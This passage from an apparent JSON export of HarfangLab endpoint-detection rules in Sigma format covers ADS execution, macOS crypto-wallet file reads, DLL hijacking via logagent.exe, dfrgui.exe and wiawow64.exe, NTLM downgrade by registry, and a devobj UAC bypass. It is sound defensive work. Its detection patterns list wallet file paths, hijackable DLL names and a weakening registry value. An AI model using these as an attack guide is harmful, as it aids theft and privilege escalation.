"rule_level_override": null,
"rule_id": "52d5939f-ceeb-494e-a325-7fa2a6295e74",
"rule_name": "Suspicious Process Execution from an ADS",
"rule_description": "Detects a process execution from an Alternate Data Stream (ADS).\nAttackers can use ADS to hide malicious binaries to evade detection mechanisms.\nIt is recommended to investigate the started process for malicious actions.\n",
"rule_creation_date": "2022-10-17",
"rule_modified_date": "2025-04-24",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "52fe691a-20e5-47ef-87f1-d8fc6bdef244",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626260Z",
"creation_date": "2026-03-23T11:45:34.626262Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626266Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1539/",
"https://attack.mitre.org/techniques/T1555/003/"
],
"name": "t1552_004_read_crypto_wallets_sensitive_files_macos.yml",
"content": "title: Suspicious Access to Crypto Wallet Sensitive Files\nid: 52fe691a-20e5-47ef-87f1-d8fc6bdef244\ndescription: |\n Detects a process reading sensitive cryptocurrency wallet files.\n Adversaries may access these files in order to steal cryptocurrencies.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1539/\n - https://attack.mitre.org/techniques/T1555/003/\ndate: 2024/06/18\nmodified: 2026/01/06\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1539\n - attack.t1555.003\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Kind: 'read'\n Path|startswith:\n - '/Users/*/.electrum/wallets/' # deskwallets/Electrum\n - '/Users/*/Library/Application Support/Coinomi/wallets/' # deskwallets/Coinomi\n - '/Users/*/Library/Application Support/Exodus/' # deskwallets/Exodus\n - '/Users/*/Library/Application Support/atomic/Local Storage/leveldb/' # deskwallets/Atomic\n - '/Users/*/.walletwasabi/client/Wallets/' # deskwallets/Wasabi\n - '/Users/*/Library/Application Support/Ledger Live/' # deskwallets/Ledger Live\n - '/Users/*/Monero/wallets/' # deskwallets/Feather (Monero)\n - '/Users/*/Library/Application Support/Bitcoin/wallets/' # deskwallets/Bitcoin Core\n - '/Users/*/Library/Application Support/Litecoin/wallets/' # deskwallets/Litecoin Core\n - '/Users/*/Library/Application Support/DashCore/wallets/' # 
deskwallets/Dash Core\n - '/Users/*/.electrum-ltc/wallets/' # deskwallets/Electrum LTC\n - '/Users/*/.electron-cash/wallets/' # deskwallets/Electron Cash\n - '/Users/*/Library/Application Support/Guarda/' # deskwallets/Guarda\n - '/Users/*/Library/Application Support/Dogecoin/wallets/' # deskwallets/Dogecoin Core\n - '/Users/*/Library/Application Support/Binance/app-store.json'\n ProcessImage|contains: '?'\n\n filter_binance:\n Image|endswith: '/Applications/Binance.app/Contents/MacOS/Binance'\n\n filter_exodus:\n Image|startswith: '/applications/exodus.app/contents/'\n\n # Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - 
'/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n exclusion_bitdefender:\n Image: '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code 
Helper.app/Contents/MacOS/Code Helper'\n # end common exclusion\n\n exclusion_ledger:\n Image|startswith:\n - '/Applications/Ledger Live.app/Contents/'\n - '/Applications/Ledger Wallet.app/Contents/'\n\n exclusion_google_update:\n Image:\n - '/Library/Application Support/Google/GoogleUpdater/*/GoogleUpdater.app/Contents/MacOS/GoogleUpdater'\n - '/users/*/library/application support/google/googleupdater/*/googleupdater.app/contents/macos/googleupdater'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "52fe691a-20e5-47ef-87f1-d8fc6bdef244",
"rule_name": "Suspicious Access to Crypto Wallet Sensitive Files",
"rule_description": "Detects a process reading sensitive cryptocurrency wallet files.\nAdversaries may access these files in order to steal cryptocurrencies.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2026-01-06",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1539",
"attack.t1555.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5301e669-0941-4751-a135-cbd3416b47ee",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619010Z",
"creation_date": "2026-03-23T11:45:34.619012Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619016Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_logagent.yml",
"content": "title: DLL Hijacking via logagent.exe\nid: 5301e669-0941-4751-a135-cbd3416b47ee\ndescription: |\n Detects potential Windows DLL Hijacking via logagent.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'logagent.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wininet.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5301e669-0941-4751-a135-cbd3416b47ee",
"rule_name": "DLL Hijacking via logagent.exe",
"rule_description": "Detects potential Windows DLL Hijacking via logagent.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "53073bd4-bc9f-4328-a7c0-c3e5a4410db7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600287Z",
"creation_date": "2026-03-23T11:45:34.600290Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600298Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dfrgui.yml",
"content": "title: DLL Hijacking via dfrgui.exe\nid: 53073bd4-bc9f-4328-a7c0-c3e5a4410db7\ndescription: |\n Detects potential Windows DLL Hijacking via dfrgui.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dfrgui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\defragproxy.dll'\n - '\\propsys.dll'\n - '\\SXSHARED.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "53073bd4-bc9f-4328-a7c0-c3e5a4410db7",
"rule_name": "DLL Hijacking via dfrgui.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dfrgui.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5329f89f-c4d1-4084-ae5a-44c204cb0413",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586418Z",
"creation_date": "2026-03-23T11:45:34.586421Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586429Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wiawow64.yml",
"content": "title: DLL Hijacking via wiawow64.exe\nid: 5329f89f-c4d1-4084-ae5a-44c204cb0413\ndescription: |\n Detects potential Windows DLL Hijacking via wiawow64.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wiawow64.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ScanSetting.DLL'\n - '\\UxTheme.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5329f89f-c4d1-4084-ae5a-44c204cb0413",
"rule_name": "DLL Hijacking via wiawow64.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wiawow64.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5333b226-43ac-4db0-ae99-03b37b486dc5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621752Z",
"creation_date": "2026-03-23T11:45:34.621754Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621758Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://threathunterplaybook.com/hunts/windows/191224-RegModExtendedNetNTLMDowngrade/notebook.html",
"https://attack.mitre.org/techniques/T1562/001/",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1562_001_ntlm_auth_enable.yml",
"content": "title: Outgoing NTLM Traffic Enabled\nid: 5333b226-43ac-4db0-ae99-03b37b486dc5\ndescription: |\n Detects when outgoing NTLM authentication is enabled in the Windows registry.\n The modification of RestrictSendingNTLMTraffic registry value to 0 permits to use NTLM as authentication mechanism.\n This weakens the security of network authentications and can be used by attackers to extract the NTLM hash.\n It is recommended to analyze the process responsible for this registry edit as well as for malicious actions in this user session.\nreferences:\n - https://threathunterplaybook.com/hunts/windows/191224-RegModExtendedNetNTLMDowngrade/notebook.html\n - https://attack.mitre.org/techniques/T1562/001/\n - https://attack.mitre.org/techniques/T1112/\ndate: 2025/06/20\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0\\RestrictSendingNTLMTraffic'\n Details: 'DWORD (0x00000000)'\n ProcessParentImage|contains: '?'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - 
'?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_deviceenroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n\n exclusion_sccm:\n ProcessAncestors|contains:\n - '?:\\MININT\\Tools\\X64\\TsManager.exe'\n - '?:\\MININT\\Tools\\X64\\TsmBootstrap.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5333b226-43ac-4db0-ae99-03b37b486dc5",
"rule_name": "Outgoing NTLM Traffic Enabled",
"rule_description": "Detects when outgoing NTLM authentication is enabled in the Windows registry.\nThe modification of RestrictSendingNTLMTraffic registry value to 0 permits to use NTLM as authentication mechanism.\nThis weakens the security of network authentications and can be used by attackers to extract the NTLM hash.\nIt is recommended to analyze the process responsible for this registry edit as well as for malicious actions in this user session.\n",
"rule_creation_date": "2025-06-20",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "534a0e88-946f-4ee2-b2c4-9862a027c71c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078062Z",
"creation_date": "2026-03-23T11:45:34.078064Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078068Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME/blob/v3.2.7/Source/Akagi/methods/hybrids.c#L198"
],
"name": "t1548_002_uac_bypass_devobj.yml",
"content": "title: UAC Bypass Executed via devobj\nid: 534a0e88-946f-4ee2-b2c4-9862a027c71c\ndescription: |\n Detects the execution of the devobj.dll UAC bypass, involving the hijacking of the DLL via winsat.exe (Windows System Assessment Tool).\n This UAC bypass method acquires elevation through abusing APPINFO.DLL whitelisting model logic and the wusa installer (Windows Update Standalone Installer) or IFileOperation autoelevation.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the child and parent processes and user session to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME/blob/v3.2.7/Source/Akagi/methods/hybrids.c#L198\ndate: 2021/01/06\nmodified: 2025/04/17\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image:\n - '*\\Windows\\SysWOW64\\\\*'\n - '*\\Windows\\System32\\sysprep\\\\*'\n ImageLoaded|endswith: '\\devobj.dll'\n\n filter_signed:\n Signed: 'true'\n Signature|contains: 'Microsoft Windows'\n\n filter_no_info:\n - ImageSize: -1\n - ImageLoaded: '\\Windows\\\\*' # image starts with \\windows\\ instead of ?:\\windows, so no info possible\n\n exclusion_not_signed:\n sha256:\n - '209ff1b6d46d1ac99518fcf54f2f726143b2dbf2c5fda90212fbef7526f7cbf5' # devobj.dll version 6.1.7601.17621 (win7sp1_gdr.110523-2108)\n - '06d6cdcc3f72f957c22c6b6357673a209ce362d2151ab2f9644a20585da4cfe6' # 
devobj.dll version 6.1.7601.23403 (win7sp1_ldr.160325-0600)\n - '01104182e4e6fb3cf6397936d30b2ce3486967586d1b94187b59a8232dae39ff' # devobj.dll version 6.1.7600.16385 (win7_rtm.090713-1255)\n - 'f87c84bb169cd301ccec1e51a4c94c05edd22d9df339b2c7bb8401a3309cc841' # devobj.dll version 10.0.19041.3155 (WinBuild.160101.0800)\n\n exclusion_legitimate:\n ImageLoaded:\n - '?:\\Windows\\SysWOW64\\devobj.dll'\n - '?:\\Windows\\system32\\devobj.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "534a0e88-946f-4ee2-b2c4-9862a027c71c",
"rule_name": "UAC Bypass Executed via devobj",
